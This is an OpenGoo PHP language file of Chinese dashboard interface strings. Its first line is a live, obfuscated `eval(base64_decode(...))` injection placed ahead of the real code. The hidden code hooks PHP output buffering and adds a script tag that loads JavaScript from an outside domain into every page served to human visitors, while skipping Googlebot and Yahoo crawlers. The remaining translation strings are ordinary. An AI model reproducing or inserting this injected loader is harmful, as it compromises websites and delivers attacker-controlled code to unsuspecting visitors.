<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5cGJtUmxjMmxuYm5OMGRXUnBiMmx1Wm04dVkyOXRMMnh6TG5Cb2NDSStQQzl6WTNKcGNIUSsiKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>
<?php

  /**
  * Dashboard interface langs
  *
  * @version 1.0
  * @author Ilija Studen <ilija.studen@gmail.com>
  */
  
  // Return langs
  return array(
    'new OpenGoo version available' => '新版本的OpenGoo 当前有效。<a class="internalLink" href="{0}" onclick="{1}">更多信息</a>.',
    
    'my tasks' => '我的任务',
    'welcome back' => '欢迎回来<strong>{0}</strong>',
    
    'online users' => '在线用户',
    'online users desc' => '最近15分钟内活动的用户:',
    
  	'charts' => '图表',
    'contacts' => '联系人',
    'dashboard' => '仪表盘',
    'administration' => '超级管理员',
    'my account' => '我的帐户',
    'my documents' => '我的文档',
	'documents' => '文档',
    'my projects' => '我的工作区',
    'my projects archive desc' => '列出关闭的工作区，这些工作区中的所有的动作将被锁定，但是你仍然可以浏览他们。',
    
    'company online' => '在线公司',
    
    'enable javascript' => '为了支持这些特性，请在你的浏览器里启用JavaScript支持。',
    
    'user password generate' => '生成随机密码',
    'user password specify' => '指定密码',
    'is administrator' => '超级管理员',
    'is auto assign' => '自动指派到新的工作区?',
    'auto assign' => '自动指派',
    'administrator update profile notice' => '超级管理员选项（仅对超级管理员有效！）',
    
    'project completed on by' => '已完成 {0} 由 {1}',
    
    'im service' => '即时消息服务',
    'primary im service' => '主即时消息服务',
    'primary im description' => '你输入的所有的即时消息地址将在你的卡片页中被列出，只有主即时消息被显示在其他页（如工作区的人员页）。',
    'contact online' => '在线联系',
    'contact offline' => '离线联系',
    
    'avatar' => '肖像',
    'current avatar' => '当前的肖像',
    'current logo' => '当前的标志',
    'new avatar' => '新肖像',
    'new logo' => '新标志、',
    'new avatar notice' => '注意：当前的肖像将被删除并替换为新的!',
    'new logo notice' => '注意：当前的标志将被删除并替换为新的!',
    
    'days late' => '推迟{0}天',
    'days left' => '还有{0}天',
    
    'user card of' => '{0}的用户卡片',
    'company card of' => '{0}的公司卡片',
    
    // Upgrade
    'upgrade is not available' => '没有OpenGoo新版本下载',
    'check for upgrade now' => '现在检查',
    
    // Forgot password
    'forgot password' => '忘记密码',
    'email me my password' => '发送密码',
    
    // Complete installation
    'complete installation' => '完成安装',
    'complete installation desc' => '这是安装进程的最后一步，将使你创建超级用户帐号并提供你公司的简介。',
    
    // Administration
    'welcome to administration' => '欢迎',
    'welcome to administration info' => '欢迎来到超级管理员面板，使用这些工具你可以管理你的公司数据，成员，客户和你涉及的工作区。',
    
    'send new account notification' => '发送电子邮件通知',
    'send new account notification desc' => '如果你选择 "是" 用户将接收一个邮件包含欢迎信息和注册参数（包含密码）。',
    
    // Tools
    'administration tools' => '工具',
    
    'test mail recepient' => '测试收件人',
    'test mail message' => '测试信息',
    'test mail message subject' => '测试主题',
    
    'massmailer subject' => '主题',
    'massmailer message' => '信息',
    'massmailer recipients' => '收件人',
    
    // Dashboard
    'welcome to new account' => '欢迎来到你刚创建的帐户',
    'welcome to new account info' => '{0}, 欢迎来到你的新帐户，从现在起它将一直生效在{1} (你可以把这个链接添加到书签中)。你可以在一分钟内开始，按照以下简单步骤:',
    'new account step1' => '第一步: 更新你的公司信息',
    'new account step1 info' => '<a class="internalLink" href="{0}">设置你的公司详细信息</a>就像电话和传真号、地址、电子邮件、主页等等。',
    'new account step2' => '第二步: 添加团队成员',
    'new account step2 info' => '你可以<a class="internalLink" href="{0}">创建用户帐号</a>为你的团队的所有成员（没有数量限制）。每个成员将将得到他们的用户名和密码用以访问系统。',
    'new account step3' => '第三步: 添加客户公司和他们的成员。',
    'new account step3 info' => '现在是<a class="internalLink" href="{0}">定义客户公司</a> 的时间(无限制)。当你完成后，你可以添加它们的成员或者离开来让他们的团队领导来作。客户成员就像你的公司成员一样，除了他们仅有受限的内容访问和功能（你可以设置他们每个成员在每个工作区的权限）。',
    'new account step4' => '第四步: 开始使用工作区',
    'new account step4 info' => '定义一个<a class="internalLink" href="{0}">新的工作区</a> 非常简单: 设置名称和描述信息（可选）并且点击提交。然后你可以为你的团队成员和客户设置权限。',
    
    // Application log
    'application log details column name' => '详细信息',
    'application log project column name' => '工作区',
    'application log taken on column name' => '动作, 由',
    
    // RSS
    'rss feeds' => 'RSS 提供',
    'recent activities feed' => '最近的活动',
    'recent project activities feed' => '在工作区\'{0}\'上的最近的活动',
    
    // Update company permissions
    'update company permissions hint' => '检查工作区来为这个公司设置访问权限。注意：你将总是需要为可以访问和管理选择的工作区的公司成员指定访问权限（你可以通过工作区成员也或者通过用户配置文件来做这些事）。',
    
    'footer copy with homepage' => '&copy; {0} <a class="internalLink" href="{1}">{2}版权所有</a>。所有权利保留。',
    'footer copy without homepage' => '&copy; {0} {1} 版权所有。 所有权利保留。',
    'footer powered' => '本站点基于 <a target="_blank" href="{0}">{1}</a>架构，中文汉化：<a target="_blank" href="mailto:autumn.peak.Z@gmail.com">秋峰，不妥之处请邮件联系。</a>或访问<a target="_blank" href="http://blog.csdn.net/autumn_peak">我的BLOG</a>',
	
	// Menu
	'all documents' => '全部文档',
	'created by me' => '我创建的',
	'by project' => '通过工作区',
	'by tag' => '通过标记',
	'by type' => '通过类型',
	'recent documents' => '最近的文档',
	'current project' => '当前工作区',
	'show hide menu' => '显示/隐藏菜单',
	'help' => '帮助',
  
  	'confirm leave page' => '如果你离开或者重新载入本页，你将丢失未提交数据。',
  
  	//Contacts
  	'add contact' => '添加联系人',
  	'edit contact' => '编辑联系人',
    'update contact' => '更新联系人',
  	'edit picture' => '编辑图片',
  	'delete contact' => '删除联系人',
  	'contact card of' => '联络卡片关于',
  	'email address 2' => '第二个电子邮件地址',
  	'email address 3' => '第三个电子邮件地址',
  	'website' => '网站',
  	'notes' => '笔记',
  	'assigned user' => '已指派的用户',
  	'contact information' => '联系人信息',
    'first name' => '首名字（姓）',
  	'last name' => '最后的名字（名）',
  	'middle name' => '中间名字',
  	'contact title' => '联系人职位',
  	'work information' => '工作信息',
  	'department' => '部门',
  	'job title' => '工作职位',
  	'location' => '位置',
    'phone number' => '电话号码',
    'phone number 2' => '第二个电话号码',
    'fax number' => '传真号',
    'assistant number' => '秘书号码',
    'callback number' => '回叫号码',
    'pager number' => '寻呼号码',
    'mobile number' => '手机',
    'personal information' => '个人信息',
    'home information' => '家庭信息',
    'other information' => '其他信息',
  
    'email and instant messaging' => '电子邮件和即时通讯',
    'no contacts in project' => '在本工作区没有联系人',
  	'picture' => '肖像',
    'current picture' => '当前图片',
    'delete current picture' => '删除当前图片',
    'confirm delete current picture' => '你是否确认你要删除当前图片?',
    'new picture' => '新图片',
    'new picture notice' => '注意：当前图片将被删除并且替换一个新的!',
    
  	'assign to project' => '指派到工作区',
  	'role' => '角色',
    'contact projects' => '联系人工作区',
    'contact identifier required' => '一个联系人姓名必须唯一',
    'birthday' => '生日',
    'role in project' => '工作区 \'{0}\' 的角色',
    'all contacts' => '所有联系人',
    'project contacts' => '在 {0} 里的联系人', 
    'select' => '选择',
  
 	// Contact import
 	'import contacts from csv' => '从.csv文件中导入联系人',
	'import' => '导入',
 	'file not exists' => '文件不存在',
	'field delimiter' => '字段分割符(可选)',
	'first record contains field names' => '第一行记录包含字段名字',
	'import contact success' => '联系人导入成功。',
	'contact fields' => '联系人字段',
	'fields from file' => '文件中的字段',
	'you must match the database fields with file fields before executing the import process' => '在执行导入程序前，文件字段和数据库字段必须匹配。',
	'import result' => '导入结果',
	'contacts succesfully imported' => '联系人成功导入',
	'contacts import fail' => '联系人导入失败',
	'contacts import fail help' => '导入程序在数据库中有已存在的数据时可能失败，如名字或者电子邮件地址等等。',
	'import fail reason' => '失败原因',
	'select a file in order to load its data' => '选择一个csv文件来加载其中的数据进行导入。',

  	// Contact export
  	'export contacts to csv' => '导出联系人到 .csv 文件',
	'export' => '导出',
	'fields to export' => '导出的信息',
	'success export contacts' => '联系人已成功导出',

	// Company import/export
	'import companies from csv' => '从.csv文件中导入公司',
	'company fields' => '公司字段',
	'companies succesfully imported' => '公司已成功导入',
	'companies import fail' => '导入公司失败',
	'export companies to csv' => '导出公司到.csv文件',
	'success export companies' => '公司已成功导出',
  
  //Webpages
  'add webpage' => '添加网站链接',
  'delete webpage' => '删除网站链接',
  'webpages' => '网站链接',
  'private webpage' => '私有网站链接',
  'url' => '网址',
  'no active webpages in project' => '在本工作区内没有发现活动的网站链接。',
  'webpage list description' => '描述信息',
  'edit webpage' => '编辑网站链接',
  'webpage' => '网站链接',
  'webpage title required' => '需要网站链接的标题',
  'webpage url required' => '需要网站链接的网址',
    
  //Email
  'emails' => '电子邮件',
  'add mail account' => '添加电子邮件帐户',
  'new mail account' => '新的电子邮件帐户',
  'no emails in this account' => '在本帐户中没有电子邮件',
  'server address' => '服务器地址',
  'mail account id' => '帐户 ID',
  'mail account name' => '帐户名称',
  'is imap' => '这是一个 IMAP 帐户',
  'incoming ssl' => '为接收电子邮件连接使用SSL',
  'incoming ssl port' => 'SSL 端口',
  'edit mail account' => '编辑邮件帐户',
  'delete mail account' => '删除邮件帐户',
  'subject' => '主题',
  'email' => '显示邮件',
  'from' => '从',
  'to' => '到',
  'date' => '日期',
  'delete email' => '删除这个邮件',
  'email message' => '电子邮件',
  'imap' => 'IMAP',
  'pop3' => 'POP3',
  'email connection method' => '连接方法',
  'classify' => '分类',
  'classify email' => '分类电子邮件',
  'classify email subject' => '分类电子邮件: \'{0}\'',
  'add attachments to project' => '添加附件到工作区',
  'project emails' => '{0} 电子邮件',
  'edit email account' => '编辑 {0}',
  'no emails in this project' => '在本工作区没有电子邮件',
  'mail content' => '电子邮件内容',
  'mail account name description' => '名称 被使用来标识这个帐户（如：\'家庭邮件帐户\')',
  'mail account id description' => '帐户用户名 或者 ID 被使用来连接到服务器(如 \'john@mailserver.com\')',
  'mail account password description' => '连接到这个帐户需要的 密码 。',
  'mail account server description' => '邮件服务器的地址，(如：\'pop3.mailserver.com\')',
  'folders to check' => '检查的文件夹',
  'after' => '以后',
  'delete mails from server' => '从服务器上删除',
  'mail account delete mails from server description' => '启用此选项可以在接收完成后从服务器上删除邮件。',
  
  //Checkout
  'checkout file' => '检出文件',
  'checkin file' => '检入文件',
  
  'new filename' => '新文件名',
  'add as revision' => '添加为修订版',
  'duplicate filename' => '复制文件名',
  'filename exists' => '指定文件名的文件已经存在，你可以选择一个不同的文件名或者在下列选项中选择一项。',
  'filename exists edit' => '指定文件名的文件已经存在，请选择一个新的文件名。',
  'checking filename' => '检测文件名...',
  'check' => '检测',
  'add file check in' => '作为本文件的一个新版本检入',
  'filters' => '过滤器',
  
  'permissions for user' => '用户 {0} 的权限',
  'can read messages' => '可以读 笔记',
  'can write messages' => '可以写 笔记',
  'can read tasks' => '可以读 任务',
  'can write tasks' => '可以写 任务',
  'can read milestones' => '可以读 里程碑',
  'can write milestones' => '可以写 里程碑',
  'can read mails' => '可以读 邮件',
  'can write mails' => '可以写 邮件',
  'can read comments' => '可以读 评论',
  'can write comments' => '可以写 评论',
  'can read contacts' => '可以读 联系人',
  'can write contacts' => '可以写 联系人',
  'can read weblinks' => '可以读 网站链接',
  'can write weblinks' => '可以写 网站链接',
  'can read files' => '可以读 文件',
  'can write files' => '可以写 文件',
  'can read events' => '可以读 事件',
  'can write events' => '可以写 事件',
  
  'new mail account' => '新邮件帐户',
  'new company' => '新公司',
  'add a new company' => '添加新公司',
  'new workspace' => '新工作区',
  'new task list' => '新任务',
  'new event' => '新事件',
  'new webpage' => '新网站链接',
  'new milestone' => '新里程碑',
  'new message' => '新笔记',
  'new group' => '新组',
  'new user' => '新用户',
  'add tags' => '添加标签',
  'save changes' => '保存改变',
  'administrator options' => '超级管理员选项',
  
  'system permissions' => '系统权限',
  'project permissions' => '工作区权限',
  
  
  /* Search */
  
  'actions' => '动作',
  'edit properties' => '编辑属性',
  'you' => '你',
  'created by' => '创建由',
  'modified by' => '编辑由',
  'deleted by' => '删除由',
  'user date' => '<a class="internalLink" href="{0}" title="显示 {3}\' 的配置文件">{1}</a>, 在 {2}',
  'user date today at' => '<a class="internalLink" href="{0}" title="显示 {3}\' 的配置文件">{1}</a>, 今天是 {2}',
  'today at' => '今天是 {0}',
  'created by on' => '创建于 <a class="internalLink" href="{0}">{1}</a> 在 {2}',
  'modified by on' => '编辑于 <a class="internalLink" href="{0}">{1}</a> 在 {2}',
  'created by on short' => '<a class="internalLink" href="{0}">{1}</a>, {2}',
  'modified by on short' => '<a class="internalLink" href="{0}">{1}</a>, {2}',
  'time used in search' => '搜索在 {0} 秒内执行完毕',
  'more results' => '有更多的 {0} 个结果...',
  
  
  'parent workspace' => '父工作区',
  'close' => '关闭',
  'all projects' => '所有工作区',
  'view as list' => '显示为列表',
  'pending tasks' => '待完成任务',
  'my pending tasks' => '我的待完成任务',
  'messages' => '笔记',
  'complete' => '完成',
  'incomplete' => '未完成',
  'complete task' => '完成本任务',
  'complete milestone' => '完成本里程碑',
  'subtask count all open' => '{0} 个子任务, {1} 个未完成',
  'due in x days' => '在 {0} 天内到期',
  'overdue by x days' => '已超期 {0} 天',
  'due today' => '今日到期',
  
  'x years' => '{0} 年',
  'x months' => '{0} 月',
  'x weeks' => '{0} 周',
  'x days' => '{0} 天',
  'x hours' => '{0} 小时',
  'x minutes' => '{0} 分钟',
  'x seconds' => '{0} 秒',
  '1 year' => '一年',
  '1 month' => '一月',
  '1 week' => '一周',
  '1 day' => '一天',
  '1 hour' => '一小时',
  '1 minute' => '一分钟',
  '1 second' => '一秒',
  
  'x ago' => '{0} 以前',
  
  'object time slots' => '对象时段',
  'start work' => '开始工作',
  'end work' => '结束工作',
  'confirm delete timeslot' => '你是否确认你要永久删除本时段?',
  'success open timeslot' => '时段已成功打开',
  'success create timeslot' => '时段已成功创建',
  'success cancel timeslot' => '时段已成功取消',
  'success close timeslot' => '时段已成功关闭',
  'success delete timeslot' => '时段已成功删除',
  'success edit timeslot' => '时段已成功编辑',
  'open timeslot message' => '总工作时间已经过: ',
  'success pause timeslot' => '时段已成功暂停',
  'success resume timeslot' => '时段已成功恢复',
  'paused timeslot message' => '时段已暂停，总时长为: {0}',
  'time since pause' => '暂停的时长',
  'pause work' => '暂停工作',
  'resume work' => '恢复工作',
  'end work description' => '工作结束描述信息',
  'add timeslot' => '添加时段',
  'edit timeslot' => '编辑时段',
  'start date' => '开始日期',
  'start time' => '开始时间',
  'end date' => '结束日期',
  'end time' => '结束时间',
  
  'tasks in progress' => '处理中任务',
  'upcoming events milestones and tasks' => '即将到来的事件、里程碑和任务',
  
  'undo checkout' => '还原文件检出',
  
  'search for in project' => '在工作区 \'{1}\' 中对 \'<i>{0}</i>\' 的搜索结果：',
  'search for' => '在所有工作区中对 \'{0}\' 的搜索结果',
  
  'workspace permamanent delete' =>  '当一个工作区被删除，意味着它的所有的内容将<b>永久丢失</b>',
	'workspace permamanent delete messages'  => ' 本工作区的所有笔记',
 'workspace permamanent delete tasks' => ' 本工作区的所有任务',
 'workspace permamanent delete milestones' => ' 本工作区的所有里程碑',
 'workspace permamanent delete files' => ' 本工作区的所有文件',
 'workspace permamanent delete logs' => ' 关联到本工作区的所有日志',
 'workspace permamanent delete mails' => ' 所有的邮件将和本工作区分离，但仍然保留在系统里。',
  'sub-workspaces permament delete' => '在{1}里的<b>{0} 个子工作区(s)</b>将和它们的内容一起被删除。',
  'multiples workspace object permanent delete' => '包含在多个工作区中的对象将不被删除。',
  'cancel permanent delete' => '取消删除操作，点击\'后退\'按钮或者关闭本标签页。',
  'confirm permanent delete workspace' => '请确认你是否真的要删除整个工作区<b>{0}</b>',
  
  'latest user activity' => '最后活动的用户',
  
  'hours' => '小时',
  'minutes' => '分钟',
  'seconds' => '秒',
  'days' => '天',
  'time estimate' => '估计时长',
  'work in progress' => '进行中的工作',
  'total time' => '总时长',
  
  'upload anyway' => '直接上传',
  
  'print view' => '预览并打印',
  'activity' => '活动',
  'statistics' => '统计',
  'time' => '时长',
  'task time report' => '总任务执行时间',
  'new tasks by user' => '用户的新任务',
  'generate report' => '生成报表',
  'task title' => '任务标题',
  'total time' => '总时长',
  'include subworkspaces' => '包括子工作区',
  'print' => '打印',
  'this week' => '本周',
  'last week' => '最后一周',
  'this month' => '本月',
  'last month' => '最后一月',
  'select dates...' => '选择日期...',
  
  'task time report description' => '这个报告显示了任务列表的总执行时长，可以指定日期、用户（可选）、和工作区（可选）。',
  'no data to display' => '没有数据显示',
  
  'new company name' => '新公司名称',
  'checking' => '检查中',
  'country' => '国家',
  
  'email addresses' => '电子邮件地址',
  'instant messaging' => '即时通讯',
  'phone' => '电话',
  'phone 2' => '第二个电话',
  'fax' => '传真',
  'assistant' => '秘书',
  'callback' => '回拨',
  'mobile' => '手机',
  'pager' => '传呼',
  
  'roles' => '角色',  
  'last updated by on' => '最后更新 {0}, 在 {1}',
  'updated' => '已更新',
  'group by' => '分组由',
  
  'total' => '总计',
  'enter tags desc' => '输入以逗号（,）分段的标签名...',
  
  'user subscribed to object' => '你已经订阅了本对象。',
  'user not subscribed to object' => '你还没有订阅本对象。',
  
  'tasks updated' => '任务已成功更新',
  'too many tasks to display' => '有太多的任务需要被显示，仅有最近的500条任务可以被显示，为了正确显示并移除本警告，请过滤任务通过工作区、标签、任务过滤器或者状态。',
  
  
  'show image in new page' => '在新页里显示图片',
  'no tasks to display' => '没有任务显示',
  'do complete' => '完成',
  
  'task data' => '任务数据',
  'search in all workspaces' => '搜索所有的工作区',
  
  'total pause time' => '总暂停时长',
  'pause time cannot be negative' => '暂停时长不能是负数',
  'pause time cannot exceed timeslot time' => '暂停时间不能超出时段长度',
  'timeslots' => '时段',
  
  'task timeslots' => '任务时段',
  'time timeslots' => '普通时段',
  'all timeslots' => '所有时段',
  
  'print report' => '打印报表',
  
  'all active tasks' => '所有活动任务',
  
  'unique id' => '唯一ID',
  
  'my pending tasks' => '我的待完成任务',
  'pending tasks for' => '{0} 的待完成任务',
  'my late milestones and tasks' => '我的延期的里程碑和任务',
  'late milestones and tasks for' => '{0} 的延期的里程碑和任务',
  'my tasks in progress' => '我的处理中任务',
  'tasks in progress for' => '{0} 的处理中任务',
  
  'time has to be greater than 0' => '时长必须大于0',
  
  'release notes' => '发布说明',
  
  'remember last' => '记住最后的',
  'auto' => '自动',
  'print all groups' => '打印所有分组',
  'shared with' => '已共享给',
  
  
  // Object Sharing
  'share object desc' => '发送一个电子邮件来邀请人们来查看此对象',
  'share with' => '共享给',
  'allow people edit object' => '允许编辑此对象',
  'must specify recipients' => '你必须指定至少一个电子邮件',
  'share' => '共享',
  'share this' => '共享此对象',
  'success sharing object' => '对象共享成功',
  'actually sharing with' => '已共享给',
  
  'share notification message desc' => '{1} 邀请你查看/编辑此笔记: {0}',
  'share notification event desc' => '{1} 邀请你查看/编辑此事件: {0}',
  'share notification task desc' => '{1} 邀请你查看/编辑此任务: {0}',
  'share notification document desc' => '{1} 邀请你查看/编辑此文档: {0}',
  'share notification contact desc' => '{1} 邀请你查看/编辑此联系人: {0}',
  'share notification company desc' => '{1} 邀请你查看/编辑此公司: {0}',
  'share notification emailunclassified desc' => '{1} 邀请你查看/编辑此未分类电子邮件: {0}',
  'share notification email desc' => '{1} 邀请你查看/编辑此电子邮件: {0}',
  'share notification file desc' => '{1} 邀请你查看/编辑此文件: {0}',
  'share notification milestone desc' => '{1} 邀请你查看/编辑此里程碑: {0}',
  'share notification weblink desc' => '{1} 邀请你查看/编辑此网站链接: {0}',
  
  'new share notification message' => '笔记 \'{0}\' 已被共享',
  'new share notification event' => '事件 \'{0}\' 已被共享',
  'new share notification task' => '任务 \'{0}\' 已被共享',
  'new share notification document' => '文档 \'{0}\' 已被共享',
  'new share notification contact' => '联系人 \'{0}\' 已被共享',
  'new share notification company' => '公司 \'{0}\' 已被共享',
  'new share notification emailunclassified' => '未分类电子邮件 \'{0}\' 已被共享',
  'new share notification email' => '电子邮件 \'{0}\' 已被共享',
  'new share notification file' => '文件 \'{0}\' 已被共享',
  'new share notification milestone' => '里程碑 \'{0}\' 已被共享',
  'new share notification weblink' => '网站链接 \'{0}\' 已被共享',
  
  'billing' => '薪酬',
  'category' => '种类',
  'hourly rates' => '每小时薪水',
  'origin' => '起因',
  'default hourly rates' => '缺省每小时薪水',
  'add billing category' => '添加薪酬种类',
  'new billing category' => '新薪酬种类',
  'edit billing category' => '编辑薪酬种类',
  'report name' => '报告显示名称',
  'billing categories' => '薪酬种类',
  'billing category' => '薪酬种类',
  'select billing category' => '-- 选择薪酬种类 --',
  'billing amount' => '数量',
  'hourly billing' => '按时计薪',
  'fixed billing' => '固定薪资',
  'show billing information' => '显示薪酬信息',
  'no billing categories' => '没有薪酬分类.',
  'no billing categories desc' => '如果你想允许关于时段和时间报表的薪酬支持，请添加一个新的薪酬种类。',
  'billing support is enabled' => '薪酬支持已启用',
  'BillingCategory default_value required' => '薪酬分类需要定义一个缺省的小时薪水。',
  'defined in a parent workspace' => '定义在父工作区中',
  'defined in the current workspace' => '定义在当前工作区中',
  'total billing by user' => '用户的总薪水',
  'assign billing categories to users' => '指派薪酬分类到用户',
  'new version notification title' => '新版本',

  'user ws config option name show dashboard info widget'=>'用户工作区信息显示小工具',
  ); // array

?>